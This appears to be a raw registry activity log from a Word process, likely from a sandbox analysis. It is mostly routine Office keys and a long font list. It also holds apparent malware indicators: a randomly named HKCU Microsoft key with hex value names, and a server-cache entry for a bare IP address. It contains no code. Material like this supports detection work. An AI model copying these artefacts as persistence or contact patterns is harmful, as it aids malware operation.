HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\3A431
3A431
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
Datetime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Data
Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\SyncProc\Resiliency\StartupItems
318
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\SyncProc\Resiliency\StartupItems
418
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheMaintenanceGuid
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
TimeCacheMaintenanceStart
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheMigrationAttempted
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WxpFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\SyncProc\Resiliency\StartupItems
xo5
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\SyncProc\Resiliency\StartupItems
yo5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Ktwzpujkk
90346181
HKEY_CURRENT_USER\Software\Microsoft\Ktwzpujkk
a5abb1cf
HKEY_CURRENT_USER\Software\Microsoft\Ktwzpujkk
a7ea91b3
HKEY_CURRENT_USER\Software\Microsoft\Ktwzpujkk
1f56f6d6
HKEY_CURRENT_USER\Software\Microsoft\Ktwzpujkk
625eb95c
HKEY_CURRENT_USER\Software\Microsoft\Ktwzpujkk
dae2de39
HKEY_CURRENT_USER\Software\Microsoft\Ktwzpujkk
1d17d6aa
HKEY_CURRENT_USER\Software\Microsoft\Ktwzpujkk
ef7d0e77
HKEY_CURRENT_USER\Software\Microsoft\Ktwzpujkk
90346181
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
cs)
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
it)
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
xw)
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://185.234.247.119/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\68823
68823
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
